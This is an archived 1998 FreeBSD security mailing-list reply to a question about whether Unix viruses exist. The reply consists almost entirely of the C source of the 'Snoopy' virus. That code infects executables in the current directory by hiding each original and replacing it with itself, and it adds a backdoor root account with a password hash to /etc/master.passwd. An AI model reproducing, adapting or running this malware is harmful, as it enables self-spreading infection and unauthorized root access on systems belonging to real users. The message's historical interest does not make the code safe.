From owner-freebsd-security Wed May 20 11:19:18 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA17687 for freebsd-security-outgoing; Wed, 20 May 1998 11:19:18 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from portal.eltex.spb.ru ([195.19.195.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA17618 for ; Wed, 20 May 1998 11:18:50 -0700 (PDT) (envelope-from ark@eltex.spb.ru) From: ark@eltex.spb.ru Received: from paranoid.eltex.spb.ru (border1.eltex.spb.ru [194.58.218.11] (may be forged)) by portal.eltex.spb.ru (8.8.8/8.8.8) with ESMTP id WAA00364; Wed, 20 May 1998 22:14:57 +0400 (MSD) Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id WAA09218; Wed, 20 May 1998 22:19:44 GMT Date: Wed, 20 May 1998 22:19:44 GMT Message-Id: <199805202219.WAA09218@paranoid.eltex.spb.ru> In-Reply-To: <3562A6DB.3412BC8B@elr346.ateng.az.honeywell.com> from "Emmanuel Gravel " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Virus on FreeBSD To: egravel@elr346.ateng.az.honeywell.com Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Emmanuel Gravel said : > I haven't heard of a virus made for a Unix-like OS before, but I'm > wondering if this can be an issue with FreeBSD (or Linux for that > matter). I'm saying this since they both run on the most common > platform there is today, the PC. I know most virii were writen for > DOS-like OS's, but it's my impression that the common point between > both machines is the hardware. > > Can anyone either clear this for me, or point me in the right direction > for some info? > > Thanks! - --- /* The Snoopy Virus for BSD Free Unix 2.0.2 (and others) */ /* (C) 1995 American Eagle Publications, Inc. All rights reserved! */ /* Compile with Gnu C, "gcc snoopy.c" */ #include #include #include #include DIR *dirp; /* directory search structure */ struct dirent *dp; /* directory entry record */ struct stat st; /* file status record */ int stst; /* status call status */ FILE *host,*virus, *pwf; /* host and virus files. */ long FileID; /* 1st 4 bytes of host */ char buf[512]; /* buffer for disk reads/writes */ char *lc,*ld; /* used to search for X23 */ size_t amt_read,hst_size; /* amount read from file, host size */ size_t vir_size=13264; /* size of X23, in bytes */ char dirname[10]; /* subdir where X23 stores itself */ char hst[512]; /* snoopy super user entry for the password file, pw='A Snoopy Dog.' */ char snoopy[]="snoopy:$1$LOARloMh$fmBvM4NKD2lcLvjhN5GjF.:0:0::0:0:Nobody:/root:"; void readline() { lc=&buf[1]; buf[0]=0; while (*(lc-1)!=10) { fread(lc,1,1,pwf); lc++; } } void writeline() { lc=&buf[1]; while (*(lc-1)!=10) { fwrite(lc,1,1,host); lc++; } } int main(argc, argv, envp) int argc; char *argv[], *envp[]; { strcpy((char *)&dirname,"./\005"); /* set up host directory name */ dirp=opendir("."); /* begin directory search */ while ((dp=readdir(dirp))!=NULL) { /* have a file, check it out */ if ((stst=stat((const char *)&dp->d_name,&st))==0) { /* get status */ lc=(char *)&dp->d_name; while (*lc!=0) lc++; lc=lc-3; /* lc points to last 3 chars in file name */ if ((!((*lc=='X')&&(*(lc+1)=='2')&&(*(lc+2)=='3'))) /* "X23"? */ &&(st.st_mode&S_IXUSR!=0)) { /* and executable? */ strcpy((char *)&buf,(char *)&dirname); strcat((char *)&buf,"/"); strcat((char *)&buf,(char *)&dp->d_name); /* see if X23 file */ strcat((char *)&buf,".X23"); /* exists already */ if ((host=fopen((char *)&buf,"r"))!=NULL) fclose(host); else { /* no it doesn't - infect! */ host=fopen((char *)&dp->d_name,"r"); fseek(host,0L,SEEK_END); /* determine host size */ hst_size=ftell(host); fclose(host); if (hst_size>=vir_size) { /* host must be large than virus */ mkdir((char *)&dirname,S_IRWXU|S_IRWXG|S_IRWXO); rename((char *)&dp->d_name,(char *)&buf); /* rename host */ if ((virus=fopen(argv[0],"r"))!=NULL) { if ((host=fopen((char *)&dp->d_name,"w"))!=NULL) { while (!feof(virus)) { /* and copy virus to orig */ amt_read=512; /* host name */ amt_read=fread(&buf,1,amt_read,virus); fwrite(&buf,1,amt_read,host); hst_size=hst_size-amt_read; } fwrite(&buf,1,hst_size,host); fclose(host); chmod((char *)&dp->d_name,S_IRWXU|S_IRWXG|S_IRWXO); strcpy((char *)&buf,(char *)&dirname); strcpy((char *)&buf,"/"); strcat((char *)&buf,(char *)&dp->d_name); chmod((char *)&buf,S_IRWXU|S_IRWXG|S_IRWXO); } else rename((char *)&buf,(char *)&dp->d_name); fclose(virus); /* infection process complete */ } /* for this file */ else rename((char *)&buf,(char *)&dp->d_name); } } } } } (void)closedir(dirp); /* infection process complete for this dir */ /* now see if we can get at the password file */ if ((pwf=fopen("/etc/master.passwd","r+"))!=NULL) { host=fopen("/etc/mast.pw","w"); /* temporary file */ stst=0; while (!feof(pwf)) { readline(); /* scan the file for user "snoopy" */ lc=&buf[1]; if ((*lc=='s')&&(*(lc+1)=='n')&&(*(lc+2)=='o')&&(*(lc+3)=='o')&& (*(lc+4)=='p')&&(*(lc+5)=='y')) stst=1; writeline(); } if (stst==0) { /* if no "snoopy" found */ strcpy((char *)&buf[1],(char *)&snoopy); /* add it! */ lc=&buf[1]; while (*lc!=0) lc++; *lc=10; writeline(); } fclose(host); fclose(pwf); rename("/etc/mast.pw","/etc/master.passwd"); /* update master.passwd */ } strcpy((char *)&buf,argv[0]); /* the host is this program's name */ lc=(char *)&buf; /* find end of directory path */ while (*lc!=0) lc++; while (*lc!='/') lc--; *lc=0; lc++; strcpy((char *)&hst,(char *)&buf); ld=(char *)&dirname+1; /* insert the ^E directory */ strcat((char *)&hst,(char *)ld); /* and put file name on the end */ strcat((char *)&hst,"/"); strcat((char *)&hst,(char *)lc); strcat((char *)&hst,".X23"); /* with an X23 tacked on */ execve((char *)&hst,argv,envp); /* execute this program's host */ } - --- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNWNW/6H/mIJW9LeBAQG/8AP9Gpmk+S3guD8o94GC6DgtyMj/NUSzcCSI oOo62VKZDSXDr6fPbmKq8gv/lKYo4IdJVXVa/q/xrN2ZciO+CdF6byDq+0D+4pjh isVSfdePAtbIVI+96x0TlLBnGcv0njkfiZ5PbWCa4QZd5Mr+DYoztCSQK+kXZ1k3 4DjolrZGoB4= =261h -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message